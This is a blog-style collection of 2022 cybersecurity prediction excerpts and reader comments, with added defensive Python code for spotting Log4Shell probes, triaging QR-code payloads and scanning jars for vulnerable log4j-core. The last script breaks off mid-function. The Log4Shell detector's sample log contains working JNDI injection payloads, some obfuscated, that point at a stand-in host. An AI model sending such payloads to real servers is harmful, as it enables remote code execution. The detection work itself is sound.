Nothing is more difficult than making predictions. Instead of throwing out wild ideas about what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threat; it's a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks, cyber criminals will likely learn from this year's successful tactics, retool, and pivot them into next year's campaigns to wreak even more havoc in all our lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints.  Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.

Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year.  Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original vulnerability (CVE-2021-44228) and the later findings in the same software (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). CVE-2021-42550, often listed alongside them, is a similar JNDI issue in the Logback library, not in Log4j.
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude. 
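The "large number of exploit variations" Akamai refers to are mostly the same ${jndi:...} lookup hidden behind other Log4j lookups (${lower:}, ${upper:}, the ${name:key:-default} fallback syntax) or percent-encoded in the request, so a signature for the literal string "${jndi:" misses most of them. The following is an added example, not code from Akamai or the Log4j project: a small Python normalizer that resolves those lookups from the inside out, the way Log4j 2.x itself would, and only then looks for the JNDI lookup. The access-log lines are constructed for this example and use documentation IP ranges.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: no nested braces inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_inner(expr):
    """Statically evaluate one innermost lookup for the handful of lookups
    attackers use to hide the word 'jndi' (lower, upper, default values)."""
    low = expr.lower()
    if low.startswith("jndi:"):              # the lookup we want to see; keep it
        return "${" + expr + "}"
    if low.startswith("lower:"):
        return expr[len("lower:"):].lower()
    if low.startswith("upper:"):
        return expr[len("upper:"):].upper()
    if ":-" in expr:                         # ${name:key:-default}: unknown key -> default
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"                 # any other lookup: leave untouched


def normalize(text, max_rounds=20):
    """Decode percent-encoding, then collapse nested lookups from the inside out.
    Bounded so a pathological input cannot loop forever."""
    text = unquote(unquote(text))            # payloads are often double-encoded in logs
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line):
    return JNDI.search(normalize(line)) is not None


def find_probes(lines):
    """(line number, normalized line) for every line carrying a JNDI lookup."""
    return [(i, normalize(l)) for i, l in enumerate(lines, 1) if is_log4shell_probe(l)]


# Constructed sample access log: five probes in different disguises, two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7/x}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/x}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7/x}"',
    '203.0.113.5 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '198.51.100.20 - - [10/Dec/2021:12:00:06 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.21 - - [10/Dec/2021:12:00:07 +0000] "GET /report?fmt=${date:yyyy-MM-dd} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, shown in find_probes(SAMPLE_LOG):
        print(f"line {lineno}: {shown}")
```

Because it resolves the lookups rather than matching fixed strings, it catches the lower/upper/default-value disguises and the URL-encoded form while leaving a benign ${date:...} template alone. It is a triage aid for finding which hosts were probed, not a substitute for patching: a probe line tells you someone tried, not whether the JNDI callback succeeded.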
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It's what all the clouds, even Microsoft Azure, run. It's what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Linux's real trouble isn't so much with open-source itself. There's nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus's law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I'm now calling Schneier's law, "Security is a process, not a product," points out, constant vigilance is needed to secure all software.

The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
We've covered five main topics: 1. Malware, 2. Mobile, 3. Machine Learning and AI, 4. Ransomware (because we simply couldn't not give it a section of its own), and 5. Where next? PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
•  Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
•  Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
•  The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
Some specific areas where AI technology will contribute to making cybersecurity smarter include:
•	AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
•	AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question "what happened," incident diagnosis analytics address the question of "why and how it happened." To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities.
•	AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.

Mobile phone security is being redone (Kännyköiden tietoturva menee uusiksi)
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, a security architecture has been in place for more than a decade: trusted processing runs in a TEE (Trusted Execution Environment), an isolated world with its own memory that the normal operating system cannot touch. The standard smartphone solution is typically built on Arm's TrustZone technology. The phone's own security comes from the TEE, and the secure boot chain usually loads and verifies it. The TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was introduced some 15 years ago).
The memory a TEE needs has not been available in the small microcontrollers used for embedded applications. Manufacturers have offered secure boot and memory or flash encryption instead, but these have been fairly weak solutions. More recently, Arm's TrustZone-M (for Armv8-M) has brought a TEE-style security model to microcontrollers.
In recent years, this picture has begun to diversify, and a revolution is now underway. Google's Android Keystore lets an application generate a key that the system maintains on its behalf and use it to authenticate to services (the keys are still protected by a TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei's Helsinki System Security Lab (HSSL). Some five years ago Intel introduced SGX (Software Guard Extensions) for PCs and servers: a set of instructions added to the CPU that lets an application create a protected enclave. In this model the TEE-style protections are provided per application by a secure enclave, which needs less trusted code than a traditional TEE. An enclave is a temporary structure in the memory of the device: it is created only for the security-sensitive work and torn down when that work completes. The difference from the TEE structure is significant: there, a separate kernel runs all the time alongside the operating system. When there is no parallel kernel, there is one component less to attack.
In Intel's SGX, enclave memory lives in a dedicated Enclave Page Cache (EPC) of limited size, which constrained how much enclaves could be used. Intel has sought to overcome this limitation with its newer TDX (Trust Domain Extensions), which protects whole virtual machines; AMD aims to do the same with its SEV (Secure Encrypted Virtualization) technology.
Enclave-style structures will also come to smartphones. The Armv9-A architecture announced in 2021 offers a realm mode (the Realm Management Extension behind Arm's Confidential Compute Architecture) that is very close to the VM-based technologies on the server side (Intel TDX, AMD SEV). With the coming enclaves, an unbounded number of isolated environments will in principle be available.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.

Cyber attacks already threaten deliveries of goods (Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin)
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime, extending it from technically savvy individuals and criminal organizations to everyone. The new "Everything as a Service" model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll warns of a "cyber pandemic": an internet disruption could throw the world into chaos again (Jarno Limnéll varoittaa "kyberpandemiasta": internetin häiriö voi panna maailman taas sekaisin)
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are the scams, and scammers always seem to be one step ahead. Sometimes they are only revealed years later. "The world is moving in a direction where technology evolves faster and faster, which rather increases the possibility of various disruptions and creates new types of vulnerabilities. There is no seamless security," Limnéll says. So technology will not make the world complete either. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler's rise to power, the shots in Sarajevo. "In light of history, we're always surprised. And if you think about it, technology only adds to the complexity and surprise of crises."
Cyber attacks are accelerating, but companies can respond to them (Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin)
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time, in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack surface of companies and organizations has grown enormously. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micro report: in the future, everything is at risk (Trend Micron raportti: tulevaisuudessa kaikki on vaarassa)
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
https://www.uusiteknologia.fi/2021/12/27/tammikuussa-jarjestetaan-avoin-kyberharjoitus/
Tomi Engdahl says:
https://www.epressi.com/tiedotteet/tietoturva/mita-kyberanalyytikko-tekee-kyberhyokkayksen-aikana-osallistu-avoimeen-kyberharjoitukseen-ja-kokeile.html
Tomi Engdahl says:
What the Rise in Cyber-Recon Means for Your Security Strategy
https://threatpost.com/rise-cyber-recon-security-strategy/177317/
Expect many more zero-day exploits in 2022, and cyberattacks using them being launched at a significantly higher rate, warns Aamir Lakhani, researcher at FortiGuard Labs.
As we move into 2022, bad actors are ramping up their reconnaissance efforts to ensure more successful and more impactful cyberattacks. And that means more zero-day exploits are on the horizon.
When seen through an attack chain such as the MITRE ATT&CK framework, campaigns are frequently discussed in terms of left-hand and right-hand phases of threats.
Tomi Engdahl says:
In 2022, security will be priority number one for Linux and open-source developers
Linux and open-source software will be hotter than ever, but the real changes will be in how they’re secured.
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Tomi Engdahl says:
6 things in cybersecurity we didn’t know last year
https://techcrunch.com/2021/12/29/six-things-we-learned-cybersecurity/
Tomi Engdahl says:
7 Steps for Navigating a Zero-Trust Journey
Don’t think of zero trust as a product. Think of it as “how you actually practice security.”
https://www.darkreading.com/edge-slideshows/7-steps-for-navigating-a-zero-trust-journey-
Tomi Engdahl says:
With attacks predicted to increase exponentially throughout 2022, maybe we should all think before scanning the next QR code we encounter.
How cybercriminals are taking advantage of QR Codes
https://cybernews.com/security/how-cybercriminals-are-taking-advantage-of-qr-codes/?utm_source=facebook&utm_medium=social&utm_campaign=cybernews&utm_content=post
Despite eliminating the need to type a URL on your smartphone and opening up new, innovative ways of engagement, marketers were forced to admit defeat and retire their obsession with quick-response (QR) codes. But a decade later, the two-dimensional barcode enjoyed somewhat of a renaissance as the low-touch economy began to take shape.
From proving your vaccination status in a nightclub or large event to ordering your food in a restaurant and even connecting to a new Wi-Fi network, QR codes thrived as consumers increasingly demanded contactless convenience. It took a global pandemic for mainstream audiences to embrace QR codes.
The types of cyberthreats hiding in QR codes
Most people will have witnessed phishing attempts that trick users into clicking on nefarious links in their emails. QR code-related threats work in a similar way.
One technique is QRLjacking, and attackers use every trick in the book by leaving codes on walls, buildings, and even computer screens that direct users to a malicious site. It could be as simple as placing a sticker on a bus stop advising passengers to scan so they can download an urgent government app update.
Quishing is another method that directs unsuspecting victims to a fake version of a popular website and prompts users to enter their login details.
Another attack method involves cybercriminals setting up a free Wi-Fi network for anyone that scans the QR Code. This so-called honeypot attack enables attackers to silently steal data such as stored banking and credit card information. There are also more primitive methods, such as replacing QR codes in public places with an alternative sticker that re-directs users to harmful online content.
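The threats listed in that article (redirect to a malicious site, credential phishing on a lookalike domain, an open Wi-Fi honeypot) are all visible in the decoded payload before anything is opened or joined. As an added example that is not part of the original post or the cited article, the Python below triages a decoded QR payload string: it recognizes the WIFI: format and URLs, and flags the signals a practitioner would check first (open network, URL shortener hiding the destination, a brand name inside a non-brand domain, punycode host, raw IP, userinfo before the host, non-web scheme, cleartext http). The shortener and brand lists are short illustrative assumptions, not a maintained feed, and decoding the image itself is left to a QR library; the payloads at the bottom are constructed.

```python
import re
from urllib.parse import urlsplit

# Assumed, illustrative lists for this example; a real deployment would use
# maintained feeds of shortener hosts and the brands you actually care about.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}
BRANDS = {"paypal.com", "google.com", "microsoft.com", "apple.com"}
# Tags that on their own justify refusing to follow the code.
HIGH = {"lookalike", "shortener", "punycode", "userinfo",
        "non-web-scheme", "open-wifi", "raw-ip", "malformed"}


def parse_wifi(payload):
    """Parse the de-facto 'WIFI:T:WPA;S:ssid;P:secret;;' QR format into a dict.
    Values may contain backslash-escaped semicolons, which the regex steps over."""
    body = payload[len("WIFI:"):]
    return {k: v for k, v in re.findall(r"([A-Za-z]+):((?:\\.|[^;])*);", body)}


def triage(payload):
    """Classify one decoded QR payload and return its kind, tags and risk level."""
    tags = []
    p = payload.strip()
    if p.upper().startswith("WIFI:"):
        kind = "wifi"
        w = parse_wifi(p)
        if w.get("T", "").lower() in ("", "nopass"):
            tags.append("open-wifi")          # honeypot-style network: no encryption
    elif re.match(r"^[a-z][a-z0-9+.-]*:", p, re.I):
        kind = "url"
        try:
            u = urlsplit(p)
            host = (u.hostname or "").lower()
            username = u.username
        except ValueError:
            return {"kind": kind, "tags": ["malformed"], "risk": "high"}
        if u.scheme not in ("http", "https"):
            tags.append("non-web-scheme")     # mailto:, tel:, app schemes; conservative
        elif u.scheme == "http":
            tags.append("cleartext-http")
        if username is not None:
            tags.append("userinfo")           # https://paypal.com@evil.example/ trick
        if host in SHORTENERS:
            tags.append("shortener")          # destination hidden until followed
        if any(label.startswith("xn--") for label in host.split(".")):
            tags.append("punycode")           # IDN host, possible homoglyph domain
        if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
            tags.append("raw-ip")
        for brand in BRANDS:
            name = brand.split(".")[0]
            # brand string present, but host is neither the brand nor one of its subdomains
            if name in host and host != brand and not host.endswith("." + brand):
                tags.append("lookalike")
                break
    else:
        kind = "text"
    risk = "high" if HIGH.intersection(tags) else ("medium" if tags else "low")
    return {"kind": kind, "tags": tags, "risk": risk}


# Constructed sample payloads, as a QR decoder would hand them over.
SAMPLE_PAYLOADS = [
    "https://www.example.com/menu",
    "http://bit.ly/3abc",
    "https://paypal.com.account-verify.example/login",
    "https://paypal.com@203.0.113.9/login",
    "WIFI:T:nopass;S:Free Airport WiFi;;",
    "https://xn--pypal-4ve.com/",
    "Table 12",
]

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        r = triage(p)
        print(f"{r['risk']:6} {r['kind']:5} {','.join(r['tags']) or '-':30} {p}")
```

The brand check deliberately accepts only the exact brand domain or a subdomain of it, so "www.paypal.com" passes while "paypal.com.account-verify.example" and "paypal.com@203.0.113.9" do not; shorteners are flagged outright because the code gives you no way to see where they lead.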
Tomi Engdahl says:
On the malicious use of large language models like GPT-3
https://research.nccgroup.com/2021/12/31/on-the-malicious-use-of-large-language-models-like-gpt-3/
While attacking machine learning systems is a hot topic for which attacks have begun to be demonstrated, I believe that there are a number of entirely novel, yet-unexplored attack-types and security risks that are specific to large language models (LMs). That may be intrinsically dependent upon things like large LMs' unprecedented scale and the massive corpus of source code and vulnerability databases within their underlying training data. This blogpost explores the theoretical question of whether (and how) large language models like GPT-3 or their successors may be useful for exploit generation, and proposes an offensive security research agenda for large language models, based on a converging mix of existing experimental findings about privacy, learned examples, security, multimodal abstraction, and generativity (of novel output, including code) by large language models including GPT-3.
Tomi Engdahl says:
Facial Recognition For Covid-19 Tracking In Seoul
https://hackaday.com/2021/12/31/facial-recognition-for-covid-19-tracking-in-seoul/
The city of Bucheon, population 830,000, is a satellite city southwest of Seoul and part of the greater metropolitan area and the site of a pilot program to apply AI facial recognition and tracking technologies to aid Covid-19 epidemiological investigators. South Korea has been generally praised for its rapid response to coronavirus patient tracking since the beginning of the outbreak. People entering public facilities enter their information on a roster or scan a QR code. Epidemiologists tracking outbreaks use a variety of data available to them, including these logs, electronic transaction data, mobile phone location logs, CCTV footage, and interviews. But the workload can be overwhelming, and there are only a fixed number of workers with the required training available, despite efforts to hire more.
https://www.reuters.com/world/asia-pacific/skorea-test-ai-powered-facial-recognition-track-covid-19-cases-2021-12-13/
Tomi Engdahl says:
A New Year Will Bring New Targets: What to Look for in 2022
https://www.securityweek.com/new-year-will-bring-new-targets-what-look-2022
Tomi Engdahl says:
What to Expect in 2022: Microservices Will Bring Macro Threats
https://www.securityweek.com/what-expect-2022-microservices-will-bring-macro-threats
If not addressed in design and deployment, the risks with microservices can multiply since any application could be composed of hundreds of microservices
Each microservice needs to expose its own set of APIs, communication methods and entry/exit points to be viable – and each of these carries a level of risk.
Secure Application Containers
Ensure Data is Protected
Reduce Access Points with an API Gateway
Use Rate Limits
Adopt Defense-in-Depth as a Strategy
Monitor and Update
Microservices are the future for cloud-based application development. The flexibility and scale allow organizations to grow on-demand and ensure that the best possible customer/service user-experience is always provided. The risks with microservices are not all that different than the risks with normal applications. Still, if not addressed in design and deployment, these risks can multiply massively since any application could be composed of hundreds of microservices.
Consider security at every stage of the design and deployment to ensure a robust security posture for your deployment.
Tomi Engdahl says:
FOR SUBSCRIBERS: "So the internet didn't catch fire after all": what the widespread software vulnerability is about, and what it demands of the victim
https://www.kauppalehti.fi/uutiset/eihan-tassa-internet-syttynytkaan-tuleen-tasta-on-kyse-laajassa-ohjelmistohaavoittuvuudessa-ja-tata-se-uhrilta-vaatii/a1222673-13a4-4226-bddd-bcacaae44f92
Cases of exploitation of the vulnerable Apache log4j software, which is widely used in internet services, have also been observed in Finland.
The vulnerability became public on 10 December and has affected organizations around the world. Criminals are trying to exploit the flaw to break into the systems of organizations, for example companies. The flaw makes it possible for an attacker to execute arbitrary commands on the server remotely. The true severity of the case may never become clear, because it is also possible to plant malware in systems that only activates after a delay. Above all, the user organization has to find out whether the vulnerability affects its own application base. The best way is to contact the software vendor.
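Both the Google figure earlier on this page (35,863 Maven Central packages still pulling in a defective Log4j) and the advice here (find out whether the vulnerability affects your own application base) come down to the same inventory question: which log4j-core actually ships inside each deployable, including jars nested inside wars and fat jars, where a build-tool dependency report does not look. The following is an added example written for this page, not the article's or Apache's code: it walks a directory, opens every jar/war/ear, recurses into nested archives, reads log4j-core's Maven pom.properties for the version, checks it against the first fixed version of its release line (2.17.1, and 2.12.4 / 2.3.2 for the Java 7 / Java 6 lines, per Apache's advisories), and also records whether JndiLookup.class is present, since deleting that class was the common interim mitigation. The sample archives are constructed in a temporary directory so the script runs offline; point scan_directory at a real deployment tree instead.

```python
import io
import os
import re
import tempfile
import zipfile

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# First version of each 2.x release line that fixes CVE-2021-44228, -45046,
# -45105 and -44832 (Apache Log4j security page, as of January 2022).
FIXED_BY_LINE = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_DEFAULT = (2, 17, 1)
NESTED = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def is_vulnerable(version):
    """True if this log4j-core version predates the fix for its release line.
    Log4j 1.x is a different code base (end of life) and is not assessed here."""
    if version[0] != 2:
        return False
    return version < FIXED_BY_LINE.get(version[:2], FIXED_DEFAULT)


def scan_archive(data, path):
    """Findings for one archive given as bytes; recurses into nested archives."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    if POM in names:
        props = zf.read(POM).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
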